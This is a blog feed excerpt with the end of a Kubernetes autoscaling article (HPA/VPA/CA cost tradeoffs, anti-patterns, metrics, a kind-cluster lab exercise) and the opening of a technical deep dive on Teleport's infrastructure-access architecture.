&lt;p&gt;&lt;strong&gt;HPA cost profile&lt;/strong&gt;: Over-scaling costs money (idle pods billed at full rate). Under-scaling costs SLO attainment. The tradeoff is asymmetric: SLO violations have reputational and sometimes contractual consequences; idle capacity has a predictable cost. Most production systems err toward over-scaling by design, using &lt;code&gt;minReplicas&lt;/code&gt; floors that keep pods warm even during off-peak hours. The cost of that floor is the explicit price of low-latency reaction.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;VPA cost profile&lt;/strong&gt;: VPA's cost impact is indirect and counterintuitive. By inflating &lt;code&gt;requests&lt;/code&gt;, VPA can reduce bin-packing efficiency — larger requests mean fewer pods per node, which means more nodes for the same actual workload. The mechanism: CA provisions for &lt;em&gt;request&lt;/em&gt; pressure, not &lt;em&gt;usage&lt;/em&gt; pressure. A cluster running at 30% actual CPU utilization but 90% request utilization looks fully packed to CA. VPA can worsen this by pushing requests upward toward observed peaks. Track both actual utilization and request utilization as separate metrics.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CA cost profile&lt;/strong&gt;: CA cost is a step function — it changes in node increments. This creates a zone of structural over-provisioning: the last node in a pool will typically carry only whatever load couldn't fit elsewhere, but it is billed the same as a fully loaded node. Overprovisioning buffer pods deliberately fill this slack, converting the wasted allocation into controlled headroom rather than accidental waste.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The lever most teams forget&lt;/strong&gt;: &lt;code&gt;maxAllowed&lt;/code&gt; in VPA and &lt;code&gt;maxReplicas&lt;/code&gt; in HPA are your primary cost controls. Without explicit upper bounds, both systems will scale toward whatever is needed to satisfy the metric — with no regard for what that costs. Set these bounds based on cost budgets, not just technical ceilings.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What Experienced Engineers Actually Do
&lt;/h2&gt;

&lt;p&gt;Theory and configuration syntax are table stakes. The harder-won knowledge is what practitioners actually run in production after a few incidents:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;On metric selection&lt;/strong&gt;: RPS or queue depth as the primary HPA signal, with CPU as a secondary ceiling to catch cases where the metrics pipeline has gaps or delays. CPU-only HPA is treated as a legacy pattern to migrate away from when the metrics infrastructure is available.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;On VPA modes&lt;/strong&gt;: &lt;code&gt;Initial&lt;/code&gt; only for production workloads. &lt;code&gt;Auto&lt;/code&gt; mode is reserved for non-critical batch workloads or development environments where evictions are acceptable. The workflow for using VPA in production is: run in &lt;code&gt;Off&lt;/code&gt; mode for two to four weeks across a full traffic cycle, collect recommendations, apply them to manifests via GitOps during a low-traffic window, and re-evaluate quarterly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;On request sizing&lt;/strong&gt;: &lt;code&gt;minAllowed&lt;/code&gt; in VPA is always anchored to load test p99 observed usage, not to VPA's recommendation from off-peak periods. This prevents VPA from shrinking requests toward near-zero values observed at 3am and then evicting pods at 9am when the requests no longer fit.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;On CA and warm capacity&lt;/strong&gt;: Overprovisioning buffer pods (low-priority &lt;code&gt;Deployment&lt;/code&gt; + negative &lt;code&gt;PriorityClass&lt;/code&gt;) are standard practice at any org that has been burned by CA bootstrap lag during a traffic event. The sizing is calibrated from load tests: buffer = expected peak replica count minus baseline replica count, sized for the workload's request footprint.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;On stabilization&lt;/strong&gt;: Scale-down &lt;code&gt;stabilizationWindowSeconds&lt;/code&gt; of 300s (the default) is treated as a floor, not a ceiling. For services with expensive startup (JVM warmup, cache population), it is extended to 600–900s to prevent premature scale-in during multi-wave traffic patterns.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;On observability&lt;/strong&gt;: Alerting on &lt;code&gt;ScalingLimited=True&lt;/code&gt; for more than two minutes, sustained &lt;code&gt;Pending&lt;/code&gt; pods, and rising &lt;code&gt;container_cpu_throttled_seconds_total&lt;/code&gt; before VPA recommendations are trusted. The debugging workflow is always: metrics first, then events, then pod resource comparison, then cross-loop interaction analysis.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Common Misconfigurations
&lt;/h2&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  HPA Anti-Patterns
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CPU target above 75%&lt;/strong&gt;: Leaves insufficient headroom for the ~90–120s reaction time pipeline. The service is already degraded before new pods serve traffic.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No scaleUp policies&lt;/strong&gt;: Allows HPA to multiply replicas in a single cycle, potentially overwhelming downstream dependencies.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Using memory as a scale-out trigger&lt;/strong&gt;: Memory-based HPA often fails to scale back in because most applications do not release allocated memory after load drops — the process holds the heap. HPA will see sustained high memory utilization and resist scale-in indefinitely. Use memory as an HPA metric only if you have confirmed your application actively releases memory under reduced load.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Not accounting for pod warm-up&lt;/strong&gt;: A newly scheduled pod is not immediately useful. If your service has a slow startup (JVM warmup, cache population), include &lt;code&gt;minReadySeconds&lt;/code&gt; and configure readiness probes that reflect actual traffic-readiness.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  VPA Anti-Patterns
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Auto mode on stateful workloads&lt;/strong&gt;: Eviction of a database or queue pod mid-operation is a data risk. Use &lt;code&gt;Off&lt;/code&gt; or &lt;code&gt;Initial&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No &lt;code&gt;minAllowed&lt;/code&gt;&lt;/strong&gt;: Without a lower bound, VPA will shrink requests toward observed minimums, which may be near zero during off-peak hours.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Switching to Auto during peak traffic&lt;/strong&gt;: Triggers an immediate wave of evictions. Always test mode changes in off-peak windows.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Combining with CPU-based HPA&lt;/strong&gt;: Creates the feedback loop described earlier. Use orthogonal metrics.&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Observability: Metrics That Matter
&lt;/h2&gt;

&lt;p&gt;Autoscaling is only debuggable if you are measuring the right signals. The closing principle of this post — that the goal is observability, not perfect configuration — requires knowing exactly which metrics to watch.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;HPA signals:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;kube_horizontalpodautoscaler_status_desired_replicas&lt;/code&gt; vs &lt;code&gt;kube_horizontalpodautoscaler_status_current_replicas&lt;/code&gt; — the gap between these is your scale lag in real time&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;kube_horizontalpodautoscaler_status_condition&lt;/code&gt; — surfaces &lt;code&gt;ScalingLimited&lt;/code&gt;, &lt;code&gt;AbleToScale&lt;/code&gt;, and &lt;code&gt;ScalingActive&lt;/code&gt; conditions; &lt;code&gt;ScalingLimited&lt;/code&gt; means rate policies or min/max bounds are constraining HPA from reaching its desired count&lt;/li&gt;
&lt;li&gt;The raw metric value vs the target threshold for each configured metric — monitor these independently to catch noisy metrics driving unexpected scale decisions&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;VPA signals:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;VPA.status.recommendation.containerRecommendations[].target&lt;/code&gt; vs actual pod requests — the gap is your rightsizing debt&lt;/li&gt;
&lt;li&gt;Eviction events on VPA-managed pods (&lt;code&gt;kubectl get events --field-selector reason=Evicted&lt;/code&gt;) — unexpected eviction frequency signals too-aggressive bounds or PDB misconfiguration&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;container_cpu_throttled_seconds_total&lt;/code&gt; — a high value means VPA's CPU observation is artificially suppressed; recommendations cannot be trusted until throttling is resolved&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;kube_pod_container_status_last_terminated_reason=OOMKilled&lt;/code&gt; — indicates VPA memory recommendations are too low or &lt;code&gt;minAllowed&lt;/code&gt; is not set correctly&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Cross-loop signals:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;kube_pod_status_phase=Pending&lt;/code&gt; with &lt;code&gt;reason=Unschedulable&lt;/code&gt; — the trigger condition for CA; sustained Pending pods mean either CA is bootstrapping or no node shape can fit the requested resources&lt;/li&gt;
&lt;li&gt;Node instance type distribution over time — VPA-driven request inflation silently changing your node pool shape will appear here before it appears in cost reports&lt;/li&gt;
&lt;/ul&gt;




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 12: Interrogate HPA Status Conditions
&lt;/h3&gt;

&lt;p&gt;Practice reading the HPA status conditions that appear in production debugging. These conditions surface the internal state of the control loop.&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Assuming php-apache HPA still exists (or recreate it)&lt;/span&gt;
kubectl autoscale deployment php-apache &lt;span class="nt"&gt;--cpu-percent&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;50 &lt;span class="nt"&gt;--min&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1 &lt;span class="nt"&gt;--max&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2 2&amp;gt;/dev/null &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;

&lt;span class="c"&gt;# Read the full status conditions&lt;/span&gt;
kubectl get hpa php-apache &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{.status.conditions}'&lt;/span&gt; | python3 &lt;span class="nt"&gt;-m&lt;/span&gt; json.tool

&lt;span class="c"&gt;# Drive it to its maxReplicas to trigger ScalingLimited&lt;/span&gt;
kubectl run limit-test &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while true; do wget -q -O- http://php-apache; sleep 0.01; done"&lt;/span&gt;

&lt;span class="c"&gt;# Wait for HPA to hit maxReplicas=2, then check conditions&lt;/span&gt;
&lt;span class="nb"&gt;sleep &lt;/span&gt;60
kubectl describe hpa php-apache | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A20&lt;/span&gt; &lt;span class="s2"&gt;"Conditions:"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; Once HPA hits &lt;code&gt;maxReplicas&lt;/code&gt;, the &lt;code&gt;ScalingLimited&lt;/code&gt; condition becomes &lt;code&gt;True&lt;/code&gt; with a message indicating the bound was hit. In production, alerting on &lt;code&gt;ScalingLimited=True&lt;/code&gt; for more than a few minutes signals that your &lt;code&gt;maxReplicas&lt;/code&gt; is too low or your workload has genuinely outgrown its current sizing.&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Also useful: describe shows human-readable metric values&lt;/span&gt;
kubectl describe hpa php-apache | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A5&lt;/span&gt; &lt;span class="s2"&gt;"Metrics:"&lt;/span&gt;

&lt;span class="c"&gt;# Cleanup&lt;/span&gt;
kubectl delete pod limit-test &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete hpa php-apache &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete deployment php-apache &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete svc php-apache &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Final Cleanup
&lt;/h2&gt;

&lt;p&gt;When you're done with all exercises:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Delete the kind cluster entirely&lt;/span&gt;
kind delete cluster &lt;span class="nt"&gt;--name&lt;/span&gt; autoscaling-lab
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;h3&gt;
  
  
  HPA Signal Tradeoff: CPU vs. External Metrics
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;CPU&lt;/th&gt;
&lt;th&gt;RPS / Queue Depth&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Signal latency&lt;/td&gt;
&lt;td&gt;High (lagging ~45s+)&lt;/td&gt;
&lt;td&gt;Low (near-real-time)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Infra dependency&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Metrics pipeline required&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;VPA coupling risk&lt;/td&gt;
&lt;td&gt;High — distorts utilization ratio&lt;/td&gt;
&lt;td&gt;None — orthogonal signal&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Throttling blind spot&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stability&lt;/td&gt;
&lt;td&gt;Higher&lt;/td&gt;
&lt;td&gt;Lower (noisy metrics amplify)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Failure mode&lt;/td&gt;
&lt;td&gt;Under-scaling&lt;/td&gt;
&lt;td&gt;Over-scaling&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  HPA vs. VPA at a Glance
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;HPA&lt;/th&gt;
&lt;th&gt;VPA&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Scaling axis&lt;/td&gt;
&lt;td&gt;Horizontal (replica count)&lt;/td&gt;
&lt;td&gt;Vertical (resource requests)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reaction speed&lt;/td&gt;
&lt;td&gt;Seconds to minutes&lt;/td&gt;
&lt;td&gt;Minutes to hours&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pod disruption&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Restart required (unless In-Place beta)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Control model&lt;/td&gt;
&lt;td&gt;Delayed P-controller&lt;/td&gt;
&lt;td&gt;Statistical percentile estimator&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Safe to combine&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;Only on orthogonal metrics&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Best for&lt;/td&gt;
&lt;td&gt;Spiky, stateless workloads&lt;/td&gt;
&lt;td&gt;Rightsizing; stateful workloads&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PDB interaction&lt;/td&gt;
&lt;td&gt;Respects during rolling update&lt;/td&gt;
&lt;td&gt;Updater respects PDB — can stall silently&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Full Reference
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;HPA&lt;/th&gt;
&lt;th&gt;VPA&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Controller location&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;kube-controller-manager&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Separate Deployment (3 components)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Metrics source&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Metrics APIs (resource/custom/external)&lt;/td&gt;
&lt;td&gt;metrics-server + historical samples&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Understanding HPA as a delayed, saturating proportional controller with a 90–120 second reaction pipeline, and VPA as a statistical offline optimizer that must restart pods to apply its recommendations and cannot observe throttled CPU accurately, reframes how you tune both systems. Neither loop operates in isolation — they share the same node pool, react to overlapping signals, and can amplify each other's effects into the destabilizing positive feedback loops described above. Map symptoms to the failure taxonomy before reaching for knobs. Instrument the signals in the observability section, and you will know which loop to blame before the incident review is scheduled.&lt;/p&gt;

&lt;p&gt;Autoscaling is not about making systems perfectly elastic — that's impossible given the phase lag, signal noise, and discrete provisioning steps involved. It is about designing systems where the failure modes are &lt;strong&gt;predictable, observable, and bounded&lt;/strong&gt;. The engineers who succeed with autoscaling aren't the ones who tune it perfectly — they're the ones who understand how it breaks.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Further reading: &lt;a href="https://github.com/kubernetes/enhancements/tree/master/keps/sig-node/1287-in-place-update-pod-resources" rel="noopener noreferrer"&gt;KEP-1287 In-Place Pod Vertical Scaling&lt;/a&gt; · &lt;a href="https://github.com/kubernetes/design-proposals-archive/blob/main/autoscaling/horizontal-pod-autoscaler.md" rel="noopener noreferrer"&gt;HPA algorithm design doc&lt;/a&gt; · &lt;a href="https://kubernetes.io/docs/reference/kubernetes-api/workload-resources/horizontal-pod-autoscaler-v2/" rel="noopener noreferrer"&gt;autoscaling/v2 API reference&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;Originally published at &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>autoscaling</category>
      <category>containers</category>
    </item>
    <item>
      <title>How Teleport Works: A Deep Dive into Modern Infrastructure Access</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Thu, 26 Mar 2026 15:40:09 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/how-teleport-works-a-deep-dive-into-modern-infrastructure-access-14m5</link>
      <guid>https://dev.to/piyushjajoo/how-teleport-works-a-deep-dive-into-modern-infrastructure-access-14m5</guid>
      <description>&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Introduction&lt;/li&gt;
&lt;li&gt;The Core Problem Teleport Solves&lt;/li&gt;
&lt;li&gt;
Teleport vs VPN vs Bastion Hosts

&lt;ul&gt;
&lt;li&gt;VPN Model&lt;/li&gt;
&lt;li&gt;Bastion Host Model&lt;/li&gt;
&lt;li&gt;Teleport Model (Zero Trust Access Plane)&lt;/li&gt;
&lt;li&gt;Quick Comparison Table&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Fundamental Architecture Concepts

&lt;ul&gt;
&lt;li&gt;Non-Obvious Insight: Teleport Shifts the Trust Boundary&lt;/li&gt;
&lt;li&gt;The Cluster: Foundation of Teleport's Security Model&lt;/li&gt;
&lt;li&gt;Certificate-Based Authentication: The Heart of Teleport&lt;/li&gt;
&lt;li&gt;Short-Lived Certificates and Zero Standing Privileges&lt;/li&gt;
&lt;li&gt;Secure Node Enrollment (Join Tokens)&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Teleport Architecture Deep Dive

&lt;ul&gt;
&lt;li&gt;Control Plane vs Traffic Plane Separation&lt;/li&gt;
&lt;li&gt;Core Components&lt;/li&gt;
&lt;li&gt;1. Auth Service: The Certificate Authority&lt;/li&gt;
&lt;li&gt;2. Proxy Service: The Access Gateway&lt;/li&gt;
&lt;li&gt;3. Teleport Agents: Protocol-Specific Services&lt;/li&gt;
&lt;li&gt;Unified Resource Inventory and Discovery&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Advanced Features

&lt;ul&gt;
&lt;li&gt;Role-Based Access Control (RBAC)&lt;/li&gt;
&lt;li&gt;Access Requests: Just-In-Time Privilege Escalation&lt;/li&gt;
&lt;li&gt;Session Recording and Playback&lt;/li&gt;
&lt;li&gt;Session Moderation and Shared Access&lt;/li&gt;
&lt;li&gt;Device Trust and Hardware Security&lt;/li&gt;
&lt;li&gt;Trusted Clusters: Multi-Org Federation&lt;/li&gt;
&lt;li&gt;Teleport Connect: Desktop Experience&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

How It All Works Together: Complete Flow Examples

&lt;ul&gt;
&lt;li&gt;Example 1: SSH Access to Production Server&lt;/li&gt;
&lt;li&gt;Example 2: Database Access Request Workflow&lt;/li&gt;
&lt;li&gt;Example 3: Kubernetes Cluster Access&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Getting Started with Teleport

&lt;ul&gt;
&lt;li&gt;Quick Start: Local Testing&lt;/li&gt;
&lt;li&gt;Common Deployment Topologies&lt;/li&gt;
&lt;li&gt;Production Deployment Checklist&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Performance and Scaling Considerations

&lt;ul&gt;
&lt;li&gt;Connection Flow Overhead&lt;/li&gt;
&lt;li&gt;Scaling Characteristics&lt;/li&gt;
&lt;li&gt;High-Performance Deployments&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Best Practices

&lt;ul&gt;
&lt;li&gt;1. Certificate TTL Configuration&lt;/li&gt;
&lt;li&gt;2. Use Access Requests for Elevated Privileges&lt;/li&gt;
&lt;li&gt;3. Implement a Governed Resource Labels Strategy&lt;/li&gt;
&lt;li&gt;4. Enable Session Recording for All Production Access&lt;/li&gt;
&lt;li&gt;5. Integrate with Your Security Stack&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Failure Modes and Operational Realities

&lt;ul&gt;
&lt;li&gt;Component Failure Behavior&lt;/li&gt;
&lt;li&gt;CA Rotation&lt;/li&gt;
&lt;li&gt;RBAC Sprawl&lt;/li&gt;
&lt;li&gt;Debugging is Harder Than Direct SSH Because Teleport Introduces Multiple Control Points — Each a Potential Failure Boundary&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Trade-offs, Limitations, and Alternatives

&lt;ul&gt;
&lt;li&gt;Teleport Trade-offs&lt;/li&gt;
&lt;li&gt;What Teleport Does NOT Solve&lt;/li&gt;
&lt;li&gt;Comparison With Modern Alternatives&lt;/li&gt;
&lt;li&gt;When Teleport Becomes a Bad Idea&lt;/li&gt;
&lt;li&gt;How Teams Typically Adopt Teleport&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Opinionated Architecture Guidance

&lt;ul&gt;
&lt;li&gt;Rules of Thumb for Production Deployments&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Troubleshooting Common Issues

&lt;ul&gt;
&lt;li&gt;Connection Issues&lt;/li&gt;
&lt;li&gt;Certificate Issues&lt;/li&gt;
&lt;li&gt;Performance Issues&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;Conclusion&lt;/li&gt;

&lt;li&gt;Additional Resources&lt;/li&gt;

&lt;/ul&gt;




&lt;p&gt;↑ Back to top&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;The average production environment has hundreds of servers, dozens of databases, multiple Kubernetes clusters, and engineers connecting from laptops, CI pipelines, and cloud VMs across every network imaginable. The traditional answer — VPNs, bastion hosts, SSH keys that accumulate for years — was never designed for this. It was designed for a world where your infrastructure lived in one data center and your engineers sat in one office.&lt;/p&gt;

&lt;p&gt;Teleport is a complete rethinking of infrastructure access for the distributed, ephemeral, multi-cloud reality most teams actually operate in. It replaces static credentials with short-lived certificates, VPN perimeters with identity-aware reverse tunnels, and fragmented audit trails with unified session recording across every protocol.&lt;/p&gt;

&lt;p&gt;This document is a technical deep dive into how Teleport works — its architecture, security model, failure behavior, and the operational decisions you'll need to make to run it well in production. It's written for engineers evaluating Teleport, implementing it, or trying to operate it at scale.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Mental Model:&lt;/strong&gt; Teleport = &lt;strong&gt;Identity-aware access proxy + certificate authority + audit system&lt;/strong&gt;. Users authenticate via SSO, receive short-lived certificates scoped to their roles, and connect to resources through a proxy that routes traffic via reverse tunnels from agents. No standing credentials. Every session recorded. Access determined by identity, not network location.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;↑ Back to top&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Core Problem Teleport Solves
&lt;/h2&gt;

&lt;p&gt;Before diving into how Teleport works, let's understand the problems it addresses:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Traditional Infrastructure Access Challenges:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static Credentials&lt;/strong&gt;: SSH keys, database passwords, and API tokens that live forever and proliferate across systems&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Trust on First Use (TOFU)&lt;/strong&gt;: The first SSH connection requires blindly trusting a host fingerprint&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Access Sprawl&lt;/strong&gt;: Different tools and methods for accessing servers, databases, Kubernetes, applications&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Poor Auditability&lt;/strong&gt;: Limited visibility into who accessed what, when, and what they did&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Credential Management&lt;/strong&gt;: Manual rotation, distribution, and revocation of access credentials&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Network Complexity&lt;/strong&gt;: VPNs, bastion hosts, and jump boxes that add latency and attack surface&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Teleport addresses these challenges through a certificate-based authentication model, unified access proxy, and comprehensive audit logging.&lt;/p&gt;

&lt;p&gt;↑ Back to top&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Teleport vs VPN vs Bastion Hosts
&lt;/h2&gt;

&lt;p&gt;Organizations have traditionally relied on VPNs and bastion hosts to provide infrastructure access. Teleport replaces these older models with a zero-trust, identity-native access plane.&lt;/p&gt;

&lt;p&gt;Here’s how they compare:&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  VPN Model
&lt;/h3&gt;

&lt;p&gt;VPNs extend the corporate network perimeter outward, effectively placing engineers “inside” the private network.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;User connects to VPN
&lt;/li&gt;
&lt;li&gt;Gains broad network-level access
&lt;/li&gt;
&lt;li&gt;Then uses SSH, kubectl, database clients directly
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Limitations:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Network-level trust instead of identity-level trust
&lt;/li&gt;
&lt;li&gt;Difficult to enforce least privilege
&lt;/li&gt;
&lt;li&gt;Poor visibility into what happens after connection
&lt;/li&gt;
&lt;li&gt;VPN credentials are often long-lived
&lt;/li&gt;
&lt;li&gt;Expands attack surface by exposing entire subnets&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Bastion Host Model
&lt;/h3&gt;

&lt;p&gt;Bastion hosts (jump boxes) centralize SSH entry through a hardened server.&lt;/p&gt;

